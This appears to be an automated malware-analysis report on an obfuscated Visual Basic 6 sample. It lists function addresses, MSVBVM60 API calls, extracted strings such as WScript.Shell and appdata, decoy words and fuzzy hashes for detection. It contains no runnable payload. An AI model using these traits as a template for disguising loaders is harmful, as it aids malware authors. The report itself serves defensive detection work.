Associated: 00000001.00000002.24596248024.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$ChkstkMove$#697#716AddrefCallCopyLate
String ID: Desorganisationens$FolderExists$Gulsoterne$Propreste7$Scripting.FileSystemObject
API String ID: 3773181626-3836659718
Opcode ID: 81368cce2580c329bc35be1c6a86989158cb481e53b03e2dd0c5cbf69d8a1c72
Instruction ID: 993e0908f6face3513dd1e0c622763fa47112846a30ec2a45ce9fd93422a6301
Opcode Fuzzy Hash: 81368cce2580c329bc35be1c6a86989158cb481e53b03e2dd0c5cbf69d8a1c72
Instruction Fuzzy Hash: 5D314A71910209A7DB14EBA2CD86FEE7778AF01708F20453FB101770E2EBBC56058B58

Uniqueness

Uniqueness Score: -1.00%

Function 0042114C, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00421168
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00421195
#582.MSVBVM60(?,?,?,?,?,?,00401546), ref: 004211AC
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,00401546), ref: 004211B1
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,?,?,00401546), ref: 004211CA
#716.MSVBVM60(000000FF,WScript.Shell,00000000,000000FF,?,?,?,?,?,?,00401546), ref: 004211E1
__vbaObjVar.MSVBVM60(000000FF,000000FF,WScript.Shell,00000000,000000FF,?,?,?,?,?,?,00401546), ref: 004211EA
__vbaObjSetAddref.MSVBVM60(?,00000000,000000FF,000000FF,WScript.Shell,00000000,000000FF,?,?,?,?,?,?,00401546), ref: 004211F4
__vbaFreeVar.MSVBVM60(?,00000000,000000FF,000000FF,WScript.Shell,00000000,000000FF,?,?,?,?,?,?,00401546), ref: 004211FC
__vbaFreeStr.MSVBVM60(00421223,?,?,?,?,?,?,00401546), ref: 00421215
__vbaFreeObj.MSVBVM60(00421223,?,?,?,?,?,?,00401546), ref: 0042121D

Strings

WScript.Shell, xrefs: 004211D8

Memory Dump Source

Source File: 00000001.00000002.24596010744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.24595979857.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.24596209797.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.24596248024.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#582#716AddrefChkstkCopyError
String ID: WScript.Shell
API String ID: 2682307056-813827646
Opcode ID: 7cec5828c2e748220aad10bfdacc2a2b69bbfff0e22139a70bc049e3979f2c18
Instruction ID: cbf3090ce13326deda58e614f37a6497e62e866cfa408eeae1c588c9e7a6e3a1
Opcode Fuzzy Hash: 7cec5828c2e748220aad10bfdacc2a2b69bbfff0e22139a70bc049e3979f2c18
Instruction Fuzzy Hash: 34111CB1900208FBDB10EFA1DD46BDEBBB8AB14708F50456EF111771E1DB7D5A048BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00421236, Relevance: 15.1, APIs: 10, Instructions: 102COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00421251
__vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0042126A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402300,00000058), ref: 00421296
__vbaObjSetAddref.MSVBVM60(?,?), ref: 004212B1
#644.MSVBVM60(?,?,?), ref: 004212BA
__vbaFreeObj.MSVBVM60(00000000,?,?,?), ref: 004212CB
__vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 0042130A
__vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 0042131B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402300,000002B0), ref: 00421352
__vbaFreeObj.MSVBVM60(00421379), ref: 00421373

Memory Dump Source

Source File: 00000001.00000002.24596010744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.24595979857.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.24596209797.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.24596248024.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Chkstk$AddrefCheckFreeHresult$#644
String ID:
API String ID: 1032928638-0
Opcode ID: 25e7e057e92137560fee1c532e5b3c600111c51a8cf45a4af8161f20a2cce5d1
Instruction ID: 0c98c4180ef7e539de13bcf30614bb65e98fc1db1d25b79b94c0326acaf2edc0
Opcode Fuzzy Hash: 25e7e057e92137560fee1c532e5b3c600111c51a8cf45a4af8161f20a2cce5d1
Instruction Fuzzy Hash: 23412571900218EFDF01DF91DC46BDEBBB9AF04744F20442AF901BB1A1C7B9A9468B58

Uniqueness

Uniqueness Score: -1.00%

Function 00401888, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6&*), ref: 0040188D

Strings

VB5!6&*, xrefs: 00401888

Memory Dump Source

Source File: 00000001.00000002.24596010744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.24595979857.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.24596209797.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.24596248024.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 5cda833674051dae6df604f3d9ccaabb4df226bb263613be5393a065696cc8c3
Instruction ID: fb17e726e7873034415a4cace1b849a8f5a4c6f47997cda8bcaa5cbce2a276ac
Opcode Fuzzy Hash: 5cda833674051dae6df604f3d9ccaabb4df226bb263613be5393a065696cc8c3
Instruction Fuzzy Hash: 4F01996044E7C29FC3075B748966545BFB09E0329032B41DBD4C0CE0B3E2290EADD7A7

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 023B02A1, Relevance: .8, Instructions: 788COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.24597717540.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9be253afc87d1bf4e518e379bbb1055037ce29f5b4a1898ee0558de95c245510
Instruction ID: 14025b01c28beaa51d33772e1f97cf73d31ed210d2102d0ce38aba804136630a
Opcode Fuzzy Hash: 9be253afc87d1bf4e518e379bbb1055037ce29f5b4a1898ee0558de95c245510
Instruction Fuzzy Hash: 6E1268118593D627DF9B3E72847E2C9BFA18E8F624F0F5BEBC5A519C0292222587D701

Uniqueness

Uniqueness Score: -1.00%

Function 023B0385, Relevance: .7, Instructions: 682COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.24597717540.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cf663c667c4501d2b23035e8ac91c75e6d6867e2a08b9f9a985f855ce086be0
Instruction ID: 27659de61c39509f856dea8f451672d67b65fca14cb1028283da12e4ff9f729c
Opcode Fuzzy Hash: 4cf663c667c4501d2b23035e8ac91c75e6d6867e2a08b9f9a985f855ce086be0
Instruction Fuzzy Hash: E2F167118593D627DFDB3E72847E2C9BFA18E8F624F0F5BEBC5A519C0292222587D701

Uniqueness

Uniqueness Score: -1.00%

Function 023B086B, Relevance: .4, Instructions: 354COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.24597717540.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28e60e86476eca6b4b78523bb0fa11f641bfa02247941a5f43d0fe09fc791015
Instruction ID: b335898e250aa549e93c408bea62cb94ad40e12b693bd795a80cf9171c13c683
Opcode Fuzzy Hash: 28e60e86476eca6b4b78523bb0fa11f641bfa02247941a5f43d0fe09fc791015
Instruction Fuzzy Hash: 6A9189018593D667DFDB3E72843E2CABFA18D8F624F0F5BEBC5A558C0292222587D741

Uniqueness

Uniqueness Score: -1.00%

Function 023B05F5, Relevance: .3, Instructions: 348COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.24597717540.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e8da3ad24f8932557b175b51f5248cc92d9e95d4bbf1c3ea620642c7874d18d
Instruction ID: 16b6e95f97e8880f46bf801105b84915e523178262fe26e0fea47c71c8e7d422
Opcode Fuzzy Hash: 0e8da3ad24f8932557b175b51f5248cc92d9e95d4bbf1c3ea620642c7874d18d
Instruction Fuzzy Hash: 818198118593D627DFDB3E72847E2C9BFA18E8F624F0F5BEBC5A518C0292222587D701

Uniqueness

Uniqueness Score: -1.00%

Function 023B00B5, Relevance: .3, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.24597717540.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6290ae2e9018f89289fa01fc4cb696f6fc81dd9a381d3597951dcd38c3e9430e
Instruction ID: 081297c5d5fc37fe7e4a749dbd8104c7614dc2b79d11138a0073a6921819fe8c
Opcode Fuzzy Hash: 6290ae2e9018f89289fa01fc4cb696f6fc81dd9a381d3597951dcd38c3e9430e
Instruction Fuzzy Hash: B8611E118593D62BDFDB3E72843E2C9BF918D8F624B0F5BEBC5A519C0292226587D701

Uniqueness

Uniqueness Score: -1.00%

Function 023B1AE1, Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.24597717540.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db92e7dfc8d33dd12dbd8627b3dbc22a4a0c34dbb1d19c52a5910ee19f8ed958
Instruction ID: ce0e86f6a5ad84d8fc22c1d0d7af0eff4f2541e837eba235ff745a3a51b12634
Opcode Fuzzy Hash: db92e7dfc8d33dd12dbd8627b3dbc22a4a0c34dbb1d19c52a5910ee19f8ed958
Instruction Fuzzy Hash: 643148118593D637DFDB3E72843E2C9BFA18E8F624F0F5BEAC5A519C4292222587D701

Uniqueness

Uniqueness Score: -1.00%

Function 023B1AD8, Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.24597717540.00000000023B0000.00000040.00000001.sdmp, Offset: 023B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b010019016608f9b5e4d3fddfea76d23e29bedbe7e353d2f172b4019324b3f9
Instruction ID: 783e979a7c5e2463d7aa9eb1186e01346a108d8f4335575e9b2d87de081a805a
Opcode Fuzzy Hash: 3b010019016608f9b5e4d3fddfea76d23e29bedbe7e353d2f172b4019324b3f9
Instruction Fuzzy Hash: BB2168118593D637DF9B3E72843E2C9BF918D8F624F0B5BEAC5A519C42D2222587D701

Uniqueness

Uniqueness Score: -1.00%

Function 00420C6D, Relevance: 82.5, APIs: 38, Strings: 9, Instructions: 225COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00420C8B
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420CB5
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420CC0
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420CCB
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00420CD6
#525.MSVBVM60(000000BE,?,?,?,?,00401546), ref: 00420CE6
__vbaStrMove.MSVBVM60(000000BE,?,?,?,?,00401546), ref: 00420CF0
#629.MSVBVM60(?,00000008,000000F9,00000002), ref: 00420D31
__vbaVarTstEq.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 00420D55
__vbaFreeStr.MSVBVM60(00008008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 00420D64
__vbaFreeVarList.MSVBVM60(00000003,00000008,00000002,?,00008008,?), ref: 00420D77
__vbaStrCat.MSVBVM60(Pollenate4,?,?,?,?,00401546), ref: 00420D96
__vbaStrMove.MSVBVM60(Pollenate4,?,?,?,?,00401546), ref: 00420DA0
#514.MSVBVM60(Apokreos,000000A7,Pollenate4,?,?,?,?,00401546), ref: 00420DAF
__vbaStrMove.MSVBVM60(Apokreos,000000A7,Pollenate4,?,?,?,?,00401546), ref: 00420DB9
#513.MSVBVM60(?,00000008,000000EA), ref: 00420DE8
__vbaStrVarMove.MSVBVM60(?,?,00000008,000000EA), ref: 00420DF1
__vbaStrMove.MSVBVM60(?,?,00000008,000000EA), ref: 00420DFB
__vbaFreeStr.MSVBVM60(?,?,00000008,000000EA), ref: 00420E03
__vbaFreeVarList.MSVBVM60(00000002,00000008,?,?,?,00000008,000000EA), ref: 00420E12
__vbaVarDup.MSVBVM60 ref: 00420E37
#542.MSVBVM60(?,?), ref: 00420E44
__vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?), ref: 00420E68
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?), ref: 00420E7E
#690.MSVBVM60(RESELLS,ADDEDLY,Antagonistiske,Sjkler7,?,?,?,?,?,?,00401546), ref: 00420EA9
__vbaNew2.MSVBVM60(0040258C,004223C0,RESELLS,ADDEDLY,Antagonistiske,Sjkler7,?,?,?,?,?,?,00401546), ref: 00420EC1
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040257C,00000014), ref: 00420F23
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040259C,00000110), ref: 00420F7F
__vbaStrMove.MSVBVM60(00000000,?,0040259C,00000110), ref: 00420FA9
__vbaFreeObj.MSVBVM60(00000000,?,0040259C,00000110), ref: 00420FB1
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,00401546), ref: 00420FBE
__vbaFreeStr.MSVBVM60(00421040,?,?,?,?,?,?,00401546), ref: 0042100A
__vbaFreeStr.MSVBVM60(00421040,?,?,?,?,?,?,00401546), ref: 00421012
__vbaFreeStr.MSVBVM60(00421040,?,?,?,?,?,?,00401546), ref: 0042101A
__vbaFreeStr.MSVBVM60(00421040,?,?,?,?,?,?,00401546), ref: 00421022

Strings

ADDEDLY, xrefs: 00420E9F
monacanthid, xrefs: 00420D36
12/12/12, xrefs: 00420E1A
Sjkler7, xrefs: 00420E95
DIVARICATE, xrefs: 00420FB6
RESELLS, xrefs: 00420EA4
Antagonistiske, xrefs: 00420E9A
Pollenate4, xrefs: 00420D91
Apokreos, xrefs: 00420DAA

Memory Dump Source

Source File: 00000001.00000002.24596010744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.24595979857.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.24596209797.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.24596248024.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$Copy$List$CheckHresult$#513#514#525#542#629#690ChkstkNew2
String ID: 12/12/12$ADDEDLY$Antagonistiske$Apokreos$DIVARICATE$Pollenate4$RESELLS$Sjkler7$monacanthid
API String ID: 3384239285-254499488
Opcode ID: 09ab68b88bf1a8ac43817a563a6d553a1f598c7454695803f8e7470ef805ca8e
Instruction ID: d50f01b18412fbc4580d9b8b1a70f8d0d5432c4d582dba75452fc105cedff475
Opcode Fuzzy Hash: 09ab68b88bf1a8ac43817a563a6d553a1f598c7454695803f8e7470ef805ca8e
Instruction Fuzzy Hash: FBA1B771E00218AFDB10EF91D885BDEB7B8BF04308F5081AAF505B71A1EB785A49CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041F60E, Relevance: 68.4, APIs: 32, Strings: 7, Instructions: 196COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041F62B
__vbaVarDup.MSVBVM60 ref: 0041F65A
#667.MSVBVM60(?), ref: 0041F663
__vbaStrMove.MSVBVM60(?), ref: 0041F66D
__vbaStrCmp.MSVBVM60(Picry,00000000,?), ref: 0041F678
__vbaFreeStr.MSVBVM60(Picry,00000000,?), ref: 0041F68F
__vbaFreeVar.MSVBVM60(Picry,00000000,?), ref: 0041F697
__vbaVarDup.MSVBVM60(Picry,00000000,?), ref: 0041F6C8
#518.MSVBVM60(?,?,Picry,00000000,?), ref: 0041F6D5
__vbaStrVarMove.MSVBVM60(?,?,?,Picry,00000000,?), ref: 0041F6DE
__vbaStrMove.MSVBVM60(?,?,?,Picry,00000000,?), ref: 0041F6E8
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,Picry,00000000,?), ref: 0041F6F7
__vbaNew2.MSVBVM60(0040258C,004223C0), ref: 0041F712
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040257C,00000014), ref: 0041F774
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040259C,00000070), ref: 0041F7CD
__vbaFreeObj.MSVBVM60(00000000,?,0040259C,00000070), ref: 0041F7EF
__vbaVarDup.MSVBVM60(Picry,00000000,?), ref: 0041F81F
#629.MSVBVM60(?,?,000000B2,00000002,Picry,00000000,?), ref: 0041F835
__vbaLenVar.MSVBVM60(?,?,?,?,000000B2,00000002,Picry,00000000,?), ref: 0041F856
__vbaVarTstNe.MSVBVM60(?,00000000,?,?,?,?,000000B2,00000002,Picry,00000000,?), ref: 0041F863
__vbaFreeVarList.MSVBVM60(00000003,?,00000002,?,?,00000000,?,?,?,?,000000B2,00000002,Picry,00000000,?), ref: 0041F87D
__vbaVarDup.MSVBVM60 ref: 0041F8AD
#522.MSVBVM60(?,?), ref: 0041F8BA
__vbaStrVarMove.MSVBVM60(?,?,?), ref: 0041F8C3
__vbaStrMove.MSVBVM60(?,?,?), ref: 0041F8CD
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?), ref: 0041F8DC
__vbaLenBstr.MSVBVM60(galopbanernes), ref: 0041F8E9
__vbaStrI4.MSVBVM60(00000000,galopbanernes), ref: 0041F8EF
__vbaStrMove.MSVBVM60(00000000,galopbanernes), ref: 0041F8F9
__vbaFreeStr.MSVBVM60(0041F953,?,?,?,?,00401546), ref: 0041F93D
__vbaFreeStr.MSVBVM60(0041F953,?,?,?,?,00401546), ref: 0041F945
__vbaFreeStr.MSVBVM60(0041F953,?,?,?,?,00401546), ref: 0041F94D

Strings

galopbanernes, xrefs: 0041F8E4
SUPERSERIOUS, xrefs: 0041F802
appdata, xrefs: 0041F63D
Langfredagene5, xrefs: 0041F6AB
Skovede1, xrefs: 0041F890
Picry, xrefs: 0041F673
f, xrefs: 0041F8FE

Memory Dump Source

Source File: 00000001.00000002.24596010744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.24595979857.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.24596209797.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.24596248024.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$List$CheckHresult$#518#522#629#667BstrChkstkNew2
String ID: Langfredagene5$Picry$SUPERSERIOUS$Skovede1$appdata$f$galopbanernes
API String ID: 1362175604-1043247457
Opcode ID: d053ce57bb6c2fa670306dd2f3c511b461d559c05ec4809760b14aaf4aa99e59
Instruction ID: 72db7ed7764511de285238dba7bf656f0ee13bd3408aae9487a22c2cee5c9056
Opcode Fuzzy Hash: d053ce57bb6c2fa670306dd2f3c511b461d559c05ec4809760b14aaf4aa99e59
Instruction Fuzzy Hash: 63810A72D00218ABDB10EBA1DC45FDEB7B8BF04304F1085AAE115B71A1DB785B89CF69

Uniqueness

Uniqueness Score: -1.00%

Function 0041F970, Relevance: 57.9, APIs: 29, Strings: 4, Instructions: 159COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041F98D
__vbaNew2.MSVBVM60(0040258C,004223C0,?,?,?,?,00401546), ref: 0041F9B2
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040257C,0000004C), ref: 0041FA14
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402ED8,00000028), ref: 0041FA66
__vbaFreeObj.MSVBVM60 ref: 0041FA7D
#697.MSVBVM60(00003139), ref: 0041FA87
__vbaStrMove.MSVBVM60(00003139), ref: 0041FA91
#618.MSVBVM60(?,00000064,00003139), ref: 0041FA9B
__vbaStrMove.MSVBVM60(?,00000064,00003139), ref: 0041FAA5
__vbaStrCmp.MSVBVM60(Sciuroid8,00000000,?,00000064,00003139), ref: 0041FAB0
__vbaFreeStr.MSVBVM60(Sciuroid8,00000000,?,00000064,00003139), ref: 0041FAC7
__vbaVarDup.MSVBVM60(Sciuroid8,00000000,?,00000064,00003139), ref: 0041FAEF
#666.MSVBVM60(?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FAFC
__vbaVarCat.MSVBVM60(?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FB1B
__vbaStrVarMove.MSVBVM60(00000000,?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FB21
__vbaStrMove.MSVBVM60(00000000,?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FB2B
__vbaFileOpen.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FB3A
__vbaFreeStr.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FB42
__vbaFreeVarList.MSVBVM60(00000003,?,?,?,00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Sciuroid8,00000000), ref: 0041FB55
__vbaGet3.MSVBVM60(00000000,00000001,00000001), ref: 0041FB65
__vbaFileClose.MSVBVM60(00000001,00000000,00000001,00000001), ref: 0041FB6C
#526.MSVBVM60(?,00000059,00000001,00000000,00000001,00000001), ref: 0041FB77
__vbaStrVarMove.MSVBVM60(?,?,00000059,00000001,00000000,00000001,00000001), ref: 0041FB80
__vbaStrMove.MSVBVM60(?,?,00000059,00000001,00000000,00000001,00000001), ref: 0041FB8A
__vbaFreeVar.MSVBVM60(?,?,00000059,00000001,00000000,00000001,00000001), ref: 0041FB92
#696.MSVBVM60(Rutiner,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FB9C
__vbaFreeStr.MSVBVM60(0041FBEC,Rutiner,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FBD6
__vbaFreeStr.MSVBVM60(0041FBEC,Rutiner,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FBDE
__vbaFreeStr.MSVBVM60(0041FBEC,Rutiner,Sciuroid8,00000000,?,00000064,00003139), ref: 0041FBE6

Strings

appdata, xrefs: 0041FADB
Rutiner, xrefs: 0041FB97
Sciuroid8, xrefs: 0041FAAB
\qc17, xrefs: 0041FB01

Memory Dump Source

Source File: 00000001.00000002.24596010744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.24595979857.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.24596209797.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.24596248024.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$CheckFileHresult$#526#618#666#696#697ChkstkCloseGet3ListNew2Open
String ID: Rutiner$Sciuroid8$\qc17$appdata
API String ID: 862176544-1118470403
Opcode ID: d563e83113586be7518ae4c46cc7268fc448b2797e501167b8352701fe0a0256
Instruction ID: cc260dfea6bdc49058e09965aefa1c1e5f1646950092b920b98befd8941e58ed
Opcode Fuzzy Hash: d563e83113586be7518ae4c46cc7268fc448b2797e501167b8352701fe0a0256
Instruction Fuzzy Hash: DE51FC71940218AEDB10EBA1CC46FDEB7B8AF14708F5041BAF105B71E1DB785A89CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041EB3A, Relevance: 56.2, APIs: 29, Strings: 3, Instructions: 179COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041EB56
#526.MSVBVM60(?,000000E8,?,?,?,?,00401546), ref: 0041EB83
__vbaStrVarVal.MSVBVM60(?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EB96
#712.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EBA6
__vbaStrMove.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EBB0
__vbaFreeStr.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EBB8
__vbaFreeVar.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EBC0
#685.MSVBVM60(Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8,?,?,?,?,00401546), ref: 0041EBC5
__vbaObjSet.MSVBVM60(00000000,00000000,Flimflam,Fribords2,00000000,?,?,00000001,000000FF,00000000,?,000000E8), ref: 0041EBCF
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040265C,0000001C), ref: 0041EBFE
#613.MSVBVM60(?,00000003), ref: 0041EC21
__vbaStrVarMove.MSVBVM60(?,?,00000003), ref: 0041EC2A
__vbaStrMove.MSVBVM60(?,?,00000003), ref: 0041EC34
__vbaFreeObj.MSVBVM60(?,?,00000003), ref: 0041EC3C
__vbaFreeVarList.MSVBVM60(00000002,00000003,?,?,?,00000003), ref: 0041EC4B
#574.MSVBVM60(00000003), ref: 0041EC65
__vbaStrMove.MSVBVM60(00000003), ref: 0041EC6F
__vbaStrCmp.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041EC7A
__vbaFreeStr.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041EC8D
__vbaFreeVar.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041EC95
#611.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041ECA6
__vbaStrMove.MSVBVM60(INVALIDNESS,00000000,00000003), ref: 0041ECB0
__vbaNew2.MSVBVM60(0040258C,004223C0,INVALIDNESS,00000000,00000003), ref: 0041ECC8
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040257C,00000014), ref: 0041ED15
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040259C,00000068), ref: 0041ED56
__vbaFreeObj.MSVBVM60(00000000,?,0040259C,00000068), ref: 0041ED75
__vbaFreeStr.MSVBVM60(0041EDBD,INVALIDNESS,00000000,00000003), ref: 0041EDA7
__vbaFreeStr.MSVBVM60(0041EDBD,INVALIDNESS,00000000,00000003), ref: 0041EDAF
__vbaFreeStr.MSVBVM60(0041EDBD,INVALIDNESS,00000000,00000003), ref: 0041EDB7

Strings

Flimflam, xrefs: 0041EBA1
INVALIDNESS, xrefs: 0041EC75
Fribords2, xrefs: 0041EB9C

Memory Dump Source

Source File: 00000001.00000002.24596010744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.24595979857.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.24596209797.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.24596248024.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$CheckHresult$#526#574#611#613#685#712ChkstkListNew2
String ID: Flimflam$Fribords2$INVALIDNESS
API String ID: 2258197736-3412120936
Opcode ID: 61d28b5211cb304e5f34d5cda738984cdf7262fe57e9fb893691fb7f9d676be2
Instruction ID: ba3fe2f6aa9922b2674dc6d2d813e94d93e7435dddd3fb8784192e01bb62a300
Opcode Fuzzy Hash: 61d28b5211cb304e5f34d5cda738984cdf7262fe57e9fb893691fb7f9d676be2
Instruction Fuzzy Hash: 8C710675D00208AFDB00EBA6D885BDDBBB8BF08704F50812AF505BB1E1EB785A45CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041EFE4, Relevance: 54.5, APIs: 29, Strings: 2, Instructions: 204COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041F001
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F019
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F024
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041F031
#524.MSVBVM60(?,00004008), ref: 0041F04B
__vbaVarTstEq.MSVBVM60(00008008,?,?,?,?,00004008), ref: 0041F066
__vbaFreeVar.MSVBVM60(00008008,?,?,?,?,00004008), ref: 0041F072
__vbaNew2.MSVBVM60(0040258C,004223C0,00008008,?,?,?,?,00004008), ref: 0041F096
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040257C,00000014,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F0E3
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040259C,000000D8,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F12A
__vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F154
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F15C
__vbaNew2.MSVBVM60(0040258C,004223C0,?,?,?,?,?,?,?,00008008,?,?,?,?,00004008), ref: 0041F174
